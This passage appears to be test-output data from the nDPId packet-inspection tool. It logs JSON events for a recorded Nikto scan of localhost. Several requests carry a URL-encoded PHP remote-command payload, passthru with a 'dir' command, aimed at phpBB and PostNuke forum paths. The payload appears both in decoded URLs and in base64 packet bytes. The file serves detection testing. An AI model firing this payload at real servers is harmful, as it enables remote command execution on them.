DQoNCg=="} -01225{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":657,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277754,"flow_last_seen":1576420277754,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277754,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50876,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":658,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277756,"flow_last_seen":1576420277756,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277756,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50878,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00895{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":658,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":658,"flow_packet_id":1,"flow_last_seen":1576420277756,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"thread_ts_msec":1576420277756,"pkt":"AAAAAAAAAAAAAAAACABFAAFsUT9AAEAG6kp\/AAABfwAAAca+H5B2qmgj3lZSb4AYAED\/YAAAAQEICp1m\/ySdZv8kR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9OaWt0bz1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01231{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":658,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277756,"flow_last_seen":1576420277756,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277756,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50878,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":659,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277758,"flow_last_seen":1576420277758,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277758,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50880,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00887{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":659,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":659,"flow_packet_id":1,"flow_last_seen":1576420277758,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277758,"pkt":"AAAAAAAAAAAAAAAACABFAAFmwkJAAEAGeU1\/AAABfwAAAcbAH5DScvtgYIpbaYAYAED\/WgAAAQEICp1m\/yadZv8mR0VUIC9tb2R1bGVzL2luZGV4LnBocD9OaWt0bz1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MCkNCg0K"} -01224{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":659,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277758,"flow_last_seen":1576420277758,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277758,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50880,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":660,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277760,"flow_last_seen":1576420277760,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277760,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50882,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00889{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":660,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":660,"flow_packet_id":1,"flow_last_seen":1576420277760,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1576420277760,"pkt":"AAAAAAAAAAAAAAAACABFAAFkSaBAAEAG8fF\/AAABfwAAAcbCH5CzknC\/qWQ1toAYAED\/WAAAAQEICp1m\/yidZv8oR0VUIC9waHBCQi9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQoNCg=="} -01222{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":660,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277760,"flow_last_seen":1576420277760,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277760,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50882,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":661,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277762,"flow_last_seen":1576420277762,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277762,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50884,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00889{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":661,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":661,"flow_packet_id":1,"flow_last_seen":1576420277762,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1576420277762,"pkt":"AAAAAAAAAAAAAAAACABFAAFkl59AAEAGo\/J\/AAABfwAAAcbEH5DhFa6+6BKXhoAYAED\/WAAAAQEICp1m\/yqdZv8qR0VUIC9mb3J1bS9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQoNCg=="} -01222{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":661,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277762,"flow_last_seen":1576420277762,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277762,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50884,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":662,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":662,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277764,"flow_last_seen":1576420277764,"flow_idle_time":7440000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277764,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50886,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00876{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":662,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":662,"flow_packet_id":1,"flow_last_seen":1576420277764,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":363,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":363,"pkt_l4_len":329,"thread_ts_msec":1576420277764,"pkt":"AAAAAAAAAAAAAAAACABFAAFdzxpAAEAGbH5\/AAABfwAAAcbGH5DgufY6a2RlI4AYAED\/UQAAAQEICp1m\/yydZv8sR0VUIC9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MSkNCg0K"} -01214{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":662,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":662,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277764,"flow_last_seen":1576420277764,"flow_idle_time":7440000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277764,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50886,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":663,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":663,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277766,"flow_last_seen":1576420277766,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277766,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50888,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":663,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":663,"flow_packet_id":1,"flow_last_seen":1576420277766,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277766,"pkt":"AAAAAAAAAAAAAAAACABFAAFm3WVAAEAGXip\/AAABfwAAAcbIH5DcNuRDgHH2c4AYAED\/WgAAAQEICp1m\/y2dZv8tR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01224{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":663,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":663,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277766,"flow_last_seen":1576420277766,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277766,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50888,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":664,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":664,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277767,"flow_last_seen":1576420277767,"flow_idle_time":7440000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":1,"thread_ts_msec":1576420277767,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50890,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00895{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":664,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":664,"flow_packet_id":1,"flow_last_seen":1576420277767,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":377,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":377,"pkt_l4_len":343,"thread_ts_msec":1576420277767,"pkt":"AAAAAAAAAAAAAAAACABFAAFrfdxAAEAGva5\/AAABfwAAAcbKH5Cyd0T8zDk2q4AYAED\/XwAAAQEICp1m\/y+dZv8vR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9uYW1lPWZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNjQlNjklNzImaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkxKQ0KDQo="} -01230{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":664,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":664,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277767,"flow_last_seen":1576420277767,"flow_idle_time":7440000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":1,"thread_ts_msec":1576420277767,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50890,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":665,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":665,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277769,"flow_last_seen":1576420277769,"flow_idle_time":7440000,"flow_min_l4_payload_len":305,"flow_max_l4_payload_len":305,"flow_tot_l4_payload_len":305,"flow_avg_l4_payload_len":305,"midstream":1,"thread_ts_msec":1576420277769,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50892,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00887{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":665,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":665,"flow_packet_id":1,"flow_last_seen":1576420277769,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":371,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":371,"pkt_l4_len":337,"thread_ts_msec":1576420277769,"pkt":"AAAAAAAAAAAAAAAACABFAAFl4jZAAEAGWVp\/AAABfwAAAcbMH5Dub9sXJ7s4LIAYAED\/WQAAAQEICp1m\/zGdZv8wR0VUIC9tb2R1bGVzL2luZGV4LnBocD9uYW1lPWZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNjQlNjklNzImaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkxKQ0KDQo="} -01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":665,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":665,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277769,"flow_last_seen":1576420277769,"flow_idle_time":7440000,"flow_min_l4_payload_len":305,"flow_max_l4_payload_len":305,"flow_tot_l4_payload_len":305,"flow_avg_l4_payload_len":305,"midstream":1,"thread_ts_msec":1576420277769,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50892,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":666,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":666,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277770,"flow_last_seen":1576420277770,"flow_idle_time":7440000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277770,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50894,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00884{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":666,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":666,"flow_packet_id":1,"flow_last_seen":1576420277770,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":369,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":369,"pkt_l4_len":335,"thread_ts_msec":1576420277770,"pkt":"AAAAAAAAAAAAAAAACABFAAFjvxlAAEAGfHl\/AAABfwAAAcbOH5BOc4Y2FZ1LBYAYAED\/VwAAAQEICp1m\/zKdZv8yR0VUIC9waHBCQi9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXIt